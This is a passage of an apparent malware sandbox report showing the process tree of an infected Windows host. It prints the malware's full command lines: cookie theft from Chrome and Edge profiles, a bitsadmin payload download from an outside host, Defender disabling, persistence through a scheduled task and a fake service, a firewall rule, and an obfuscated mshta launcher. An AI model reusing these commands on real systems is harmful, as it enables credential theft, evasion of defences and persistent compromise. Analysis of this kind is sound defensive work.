                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                          8⤵
                                                                                            PID:5728
                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            8⤵
                                                                                              PID:4644
                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                              8⤵
                                                                                                PID:4116
                                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                8⤵
                                                                                                  PID:3692
                                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                  8⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:2808
                                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                  8⤵
                                                                                                    PID:4836
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                    8⤵
                                                                                                      PID:5308
                                                                                                  • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                    "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                    7⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:1472
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      8⤵
                                                                                                        PID:6076
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        8⤵
                                                                                                          PID:5456
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                          8⤵
                                                                                                            PID:2012
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                            8⤵
                                                                                                              PID:4840
                                                                                                        • C:\Users\Admin\Documents\os1j9FwlmbibkPju4IwPQyz8.exe
                                                                                                          "C:\Users\Admin\Documents\os1j9FwlmbibkPju4IwPQyz8.exe"
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:4416
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                            7⤵
                                                                                                              PID:5008
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                              7⤵
                                                                                                                PID:4360
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                7⤵
                                                                                                                  PID:5492
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                  7⤵
                                                                                                                    PID:5252
                                                                                                                • C:\Users\Admin\Documents\P5PRa53g3C00qDRzXjOjzIzH.exe
                                                                                                                  "C:\Users\Admin\Documents\P5PRa53g3C00qDRzXjOjzIzH.exe"
                                                                                                                  6⤵
                                                                                                                    PID:2808
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im P5PRa53g3C00qDRzXjOjzIzH.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\P5PRa53g3C00qDRzXjOjzIzH.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                      7⤵
                                                                                                                        PID:6088
                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                          taskkill /im P5PRa53g3C00qDRzXjOjzIzH.exe /f
                                                                                                                          8⤵
                                                                                                                          • Kills process with taskkill
                                                                                                                          PID:5344
                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                          timeout /t 6
                                                                                                                          8⤵
                                                                                                                          • Delays execution with timeout.exe
                                                                                                                          PID:6040
                                                                                                                    • C:\Users\Admin\Documents\FDT9EvnEoR6Py6vtobGj1nEH.exe
                                                                                                                      "C:\Users\Admin\Documents\FDT9EvnEoR6Py6vtobGj1nEH.exe"
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:4760
                                                                                                                      • C:\Users\Admin\Documents\FDT9EvnEoR6Py6vtobGj1nEH.exe
                                                                                                                        "C:\Users\Admin\Documents\FDT9EvnEoR6Py6vtobGj1nEH.exe"
                                                                                                                        7⤵
                                                                                                                          PID:6000
                                                                                                                      • C:\Users\Admin\Documents\kfXPt6qNNqQjev7LV3cAXPk_.exe
                                                                                                                        "C:\Users\Admin\Documents\kfXPt6qNNqQjev7LV3cAXPk_.exe"
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:4120
                                                                                                                        • C:\Users\Admin\Documents\kfXPt6qNNqQjev7LV3cAXPk_.exe
                                                                                                                          C:\Users\Admin\Documents\kfXPt6qNNqQjev7LV3cAXPk_.exe
                                                                                                                          7⤵
                                                                                                                            PID:5864
                                                                                                                        • C:\Users\Admin\Documents\ycpJgYNPJaZdBNMb2LpBxKcB.exe
                                                                                                                          "C:\Users\Admin\Documents\ycpJgYNPJaZdBNMb2LpBxKcB.exe"
                                                                                                                          6⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Drops file in Program Files directory
                                                                                                                          PID:4952
                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfDDA1.tmp\tempfile.ps1"
                                                                                                                            7⤵
                                                                                                                              PID:5396
                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfDDA1.tmp\tempfile.ps1"
                                                                                                                              7⤵
                                                                                                                                PID:5344
                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfDDA1.tmp\tempfile.ps1"
                                                                                                                                7⤵
                                                                                                                                  PID:2500
                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfDDA1.tmp\tempfile.ps1"
                                                                                                                                  7⤵
                                                                                                                                    PID:4384
                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfDDA1.tmp\tempfile.ps1"
                                                                                                                                    7⤵
                                                                                                                                      PID:5312
                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfDDA1.tmp\tempfile.ps1"
                                                                                                                                      7⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:3456
                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfDDA1.tmp\tempfile.ps1"
                                                                                                                                      7⤵
                                                                                                                                        PID:5520
                                                                                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                        "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                                                                                                        7⤵
                                                                                                                                        • Download via BitsAdmin
                                                                                                                                        PID:4232
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                                                  4⤵
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:4044
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4BDEBB04\sonia_6.exe
                                                                                                                                    sonia_6.exe
                                                                                                                                    5⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Adds Run key to start application
                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                    PID:868
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:4212
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:1212
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                      6⤵
                                                                                                                                        PID:3936
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                        6⤵
                                                                                                                                          PID:2812
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                                                      4⤵
                                                                                                                                        PID:2164
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3912 -s 440
                                                                                                                                        4⤵
                                                                                                                                        • Program crash
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:3780
                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                                  1⤵
                                                                                                                                    PID:1420
                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                                    1⤵
                                                                                                                                      PID:1412
                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                                      1⤵
                                                                                                                                        PID:1176
                                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                                        1⤵
                                                                                                                                          PID:1140
                                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                          1⤵
                                                                                                                                            PID:1084
                                                                                                                                            • \??\c:\windows\system\svchost.exe
                                                                                                                                              c:\windows\system\svchost.exe
                                                                                                                                              2⤵
                                                                                                                                                PID:6140
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\rcejdri
                                                                                                                                                C:\Users\Admin\AppData\Roaming\rcejdri
                                                                                                                                                2⤵
                                                                                                                                                  PID:5876
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\tjejdri
                                                                                                                                                  C:\Users\Admin\AppData\Roaming\tjejdri
                                                                                                                                                  2⤵
                                                                                                                                                    PID:4372
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\tjejdri
                                                                                                                                                      C:\Users\Admin\AppData\Roaming\tjejdri
                                                                                                                                                      3⤵
                                                                                                                                                        PID:5812
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\ubejdri
                                                                                                                                                      C:\Users\Admin\AppData\Roaming\ubejdri
                                                                                                                                                      2⤵
                                                                                                                                                        PID:2100
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\btejdri
                                                                                                                                                        C:\Users\Admin\AppData\Roaming\btejdri
                                                                                                                                                        2⤵
                                                                                                                                                          PID:1032
                                                                                                                                                        • \??\c:\windows\system\svchost.exe
                                                                                                                                                          c:\windows\system\svchost.exe
                                                                                                                                                          2⤵
                                                                                                                                                            PID:5000
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\rcejdri
                                                                                                                                                            C:\Users\Admin\AppData\Roaming\rcejdri
                                                                                                                                                            2⤵
                                                                                                                                                              PID:1092
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\btejdri
                                                                                                                                                              C:\Users\Admin\AppData\Roaming\btejdri
                                                                                                                                                              2⤵
                                                                                                                                                                PID:1168
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\ubejdri
                                                                                                                                                                C:\Users\Admin\AppData\Roaming\ubejdri
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:1848
                                                                                                                                                                • \??\c:\windows\system\svchost.exe
                                                                                                                                                                  c:\windows\system\svchost.exe
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:4820
                                                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:1008
                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                    PID:3224
                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      PID:4376
                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      PID:4564
                                                                                                                                                                  • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                    PID:4256
                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                      PID:4276
                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:5996
                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:5448
                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:1404
                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:3036
                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:6036
                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:3568
                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:5348
                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:5192
                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:2376
                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:820
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1E3D.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\1E3D.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:4936
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1E3D.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\1E3D.exe
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:4808
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2301.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\2301.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:4756
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\29F7.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\29F7.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:6052
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\315B.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\315B.exe
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:4560
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\395B.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\395B.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:3848
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\6AAD.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\6AAD.exe
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:5068
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\78D7.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\78D7.exe
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:1892
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im 78D7.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\78D7.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:5164
                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                              taskkill /im 78D7.exe /f
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                              PID:5956
                                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                              timeout /t 6
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                              PID:5720
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\AAC5.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\AAC5.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:1756
                                                                                                                                                                                                            • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                              "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:4732
                                                                                                                                                                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                                                schtasks /create /sc minute /ED "12/12/2022" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                PID:1820
                                                                                                                                                                                                              • C:\Windows\System\svchost.exe
                                                                                                                                                                                                                "C:\Windows\System\svchost.exe" formal
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:4936
                                                                                                                                                                                                                  • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                    "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:6072
                                                                                                                                                                                                                    • C:\Windows\System\spoolsv.exe
                                                                                                                                                                                                                      "C:\Windows\System\spoolsv.exe" --MaxCircuitDirtiness 60 --NewCircuitPeriod 1 --MaxClientCircuitsPending 1024 --OptimisticData 1 --KeepalivePeriod 30 --CircuitBuildTimeout 10 --EnforceDistinctSubnets 0 --HardwareAccel 1 --UseEntryGuards 0
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:4508
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:2560
                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:3928
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:4120
                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:4112
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:3964
                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:5748
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:5484
                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:5848
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:5316
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\6135.exe
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\6135.exe
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:4760
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\8F46.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\8F46.exe
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:872
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\aepgxzqz\
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:1048
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\sldzxiw.exe" C:\Windows\SysWOW64\aepgxzqz\
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:1260
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\sc.exe" create aepgxzqz binPath= "C:\Windows\SysWOW64\aepgxzqz\sldzxiw.exe /d\"C:\Users\Admin\AppData\Local\Temp\8F46.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:1988
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                  "C:\Windows\System32\sc.exe" description aepgxzqz "wifi internet conection"
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:2952
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\sc.exe" start aepgxzqz
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:5408
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:4264
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\9468.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\9468.exe
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:4116
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" VbscrIpt: CLose(CReAtEoBJect ( "wscriPT.shell"). rUN ( "C:\Windows\system32\cmd.exe /c CopY /y ""C:\Users\Admin\AppData\Local\Temp\9468.exe"" ..\yWUAUK.eXE && stArT ..\ywUAUK.eXE -PVb9gGBiRPixyURGJ2&iF """" == """" for %e IN ( ""C:\Users\Admin\AppData\Local\Temp\9468.exe"" ) do taskkill /F /Im ""%~Nxe"" ", 0 , TrUe))
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:4620
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
